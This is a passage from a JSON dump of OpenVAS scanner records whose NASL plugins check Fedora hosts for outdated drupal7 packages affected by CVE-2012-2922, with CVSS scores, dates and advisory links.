script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.20~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-03T10:58:27", "description": "Check for the Version of drupal7", "cvss3": {}, "published": "2012-06-04T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-8360", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2018-01-03T00:00:00", "id": "OPENVAS:864276", "href": "http://plugins.openvas.org/nasl.php?oid=864276", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-8360\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"drupal7 on Fedora 15\";\ntag_insight = \"Equipped with a powerful blend of features, Drupal is a Content Management\n System written in PHP that can support a variety of websites ranging from\n personal weblogs to large community-driven websites. Drupal is highly\n configurable, skinnable, and secure.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/081662.html\");\n script_id(864276);\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-04 11:06:44 +0530 (Mon, 04 Jun 2012)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2012-8360\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-8360\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of drupal7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n 
script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.14~2.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-22T13:09:39", "description": "Check for the Version of drupal7", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2013-1076", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2018-01-22T00:00:00", "id": "OPENVAS:865260", "href": "http://plugins.openvas.org/nasl.php?oid=865260", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2013-1076\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"drupal7 on Fedora 17\";\ntag_insight = \"Equipped with a powerful blend of features, Drupal is a Content Management\n System written in PHP that can support a variety of websites ranging from\n personal weblogs to large community-driven websites. Drupal is highly\n configurable, skinnable, and secure.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097647.html\");\n script_id(865260);\n script_version(\"$Revision: 8483 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 07:58:04 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:24:35 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2013-1076\");\n script_name(\"Fedora Update for drupal7 FEDORA-2013-1076\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of drupal7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n 
script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.19~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-11T11:06:23", "description": "Check for the Version of drupal7", "cvss3": {}, "published": "2012-10-29T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-16421", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2018-01-09T00:00:00", "id": "OPENVAS:864824", "href": "http://plugins.openvas.org/nasl.php?oid=864824", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-16421\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"drupal7 on Fedora 16\";\ntag_insight = \"Equipped with a powerful blend of features, Drupal is a Content Management\n System written in PHP that can support a variety of websites ranging from\n personal weblogs to large community-driven websites. Drupal is highly\n configurable, skinnable, and secure.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-October/090859.html\");\n script_id(864824);\n script_version(\"$Revision: 8336 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-09 08:01:48 +0100 (Tue, 09 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-10-29 11:02:22 +0530 (Mon, 29 Oct 2012)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2012-16421\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-16421\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of drupal7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n 
script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.16~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-11T11:07:38", "description": "Check for the Version of drupal7", "cvss3": {}, "published": "2012-08-30T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-8398", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2018-01-10T00:00:00", "id": "OPENVAS:864328", "href": "http://plugins.openvas.org/nasl.php?oid=864328", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-8398\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"drupal7 on Fedora 17\";\ntag_insight = \"Equipped with a powerful blend of features, Drupal is a Content Management\n System written in PHP that can support a variety of websites ranging from\n personal weblogs to large community-driven websites. Drupal is highly\n configurable, skinnable, and secure.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/081721.html\");\n script_id(864328);\n script_version(\"$Revision: 8352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-10 08:01:57 +0100 (Wed, 10 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:03:18 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2012-8398\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-8398\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of drupal7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n 
script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.14~2.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:37:57", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-03-08T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2013-2872", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310865431", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865431", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2013-2872\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-March/099673.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865431\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-08 10:16:43 +0530 (Fri, 08 Mar 2013)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2013-2872\");\n script_name(\"Fedora Update for drupal7 FEDORA-2013-2872\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.20~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:32:14", "description": "The remote host is missing an update for the 'drupal7' package(s) announced via the FEDORA-2019-0c1d62bf5b advisory.", "cvss3": {}, "published": "2019-05-07T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2019-0c1d62bf5b", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2019-05-14T00:00:00", "id": "OPENVAS:1361412562310876313", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876313", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876313\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:44:00 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for drupal7 FEDORA-2019-0c1d62bf5b\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-0c1d62bf5b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QLDL4RPEK6NZBNPCXUVPH5DPWLROWFJ6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the FEDORA-2019-0c1d62bf5b advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Equipped with a powerful blend of features, Drupal is a Content Management\nSystem written in PHP that can support a variety of websites ranging from\npersonal weblogs to large community-driven websites. 
Drupal is highly\nconfigurable, skinnable, and secure.\");\n\n script_tag(name:\"affected\", value:\"'drupal7' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.64~1.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:19", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2013-1076", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310865260", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865260", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2013-1076\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR 
PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097647.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865260\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:24:35 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2013-1076\");\n script_name(\"Fedora Update for drupal7 FEDORA-2013-1076\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.19~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:57", "description": "The remote host is missing an update for the 'drupal7' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2012-06-04T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-8360", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864276", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864276", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-8360\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/081662.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864276\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-04 11:06:44 +0530 (Mon, 04 Jun 2012)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2012-8360\");\n script_name(\"Fedora Update for drupal7 FEDORA-2012-8360\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.14~2.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:12", "description": "The remote host is missing an update for the 'drupal7' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2012-06-04T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-8362", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864275", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864275", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2012-8362\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
